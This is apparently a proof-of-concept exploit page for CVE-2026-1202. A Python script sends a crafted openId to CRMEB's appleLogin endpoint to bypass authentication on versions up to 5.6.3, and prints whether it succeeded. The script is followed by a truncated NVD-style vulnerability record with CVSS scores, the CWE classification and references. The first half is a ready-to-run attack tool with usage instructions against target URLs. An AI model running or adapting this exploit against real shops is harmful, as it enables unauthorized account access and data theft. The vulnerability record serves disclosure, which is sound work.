CVE-2026-1202

# CVE-2026-1202 CRMEB appleLogin Authentication Bypass PoC # Target: CRMEB <= 5.6.3 # Type: Authentication Bypass via openId Parameter import requests import json import sys def exploit_crmeb_auth_bypass(target_url, malicious_openid): """ Exploit for CVE-2026-1202: CRMEB appleLogin Authentication Bypass Args: target_url: Base URL of the vulnerable CRMEB instance malicious_openid: Maliciously crafted openId value Returns: dict: Response containing authentication result """ endpoint = f"{target_url}/api/v1/login/appleLogin" # Craft the malicious request payload = { "openId": malicious_openid, "nickname": "attacker", "avatar": "https://example.com/malicious_avatar.jpg" } headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" } try: response = requests.post(endpoint, json=payload, headers=headers, timeout=10) return { "status_code": response.status_code, "response": response.json() if response.headers.get("content-type") == "application/json" else response.text, "success": response.status_code == 200 } except requests.exceptions.RequestException as e: return {"error": str(e), "success": False} def main(): if len(sys.argv) < 3: print("Usage: python cve-2026-1202.py <target_url> <malicious_openid>") print("Example: python cve-2026-1202.py http://target.com '{""sub""="attacker_id"}'") sys.exit(1) target_url = sys.argv[1].rstrip('/') malicious_openid = sys.argv[2] print(f"[*] Targeting: {target_url}") print(f"[*] Using malicious openId: {malicious_openid}") result = exploit_crmeb_auth_bypass(target_url, malicious_openid) if result.get("success"): print("[+] Authentication bypass successful!") print(f"[+] Response: {json.dumps(result['response'], indent=2)}") else: print("[-] Exploitation failed or target not vulnerable") if "error" in result: print(f"[-] Error: {result['error']}") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2026-1202", "sourceIdentifier": "[email protected]", "published": "2026-01-20T01:15:56.800", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in CRMEB up to 5.6.3. The affected element is the function appleLogin of the file crmeb/app/api/controller/v1/LoginController.php. Performing a manipulation of the argument openId results in improper authentication. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Una falla de seguridad ha sido descubierta en CRMEB hasta la versión 5.6.3. El elemento afectado es la función appleLogin del archivo crmeb/app/API/controller/v1/LoginController.PHP. Realizar una manipulación del argumento openId resulta en autenticación impropia. El ataque es posible de llevar a cabo de forma remota. El exploit ha sido publicado y puede ser utilizado para ataques. El proveedor fue contactado tempranamente sobre esta divulgación pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:crmeb:crmeb:*:*:*:*:*:*:*:*", "versionEndIncluding": "5.6.3", "matchCriteriaId": "F4890E95-8C9F-4E12-B5A2-72AF73C7F7BE"}]}]}], "references": [{"url": "https://github.com/foeCat/CVE/blob/main/CRMEB/apple_login_auth_bypass.md", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.341788", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.341788", "source": "cna@vuldb. ... (truncated)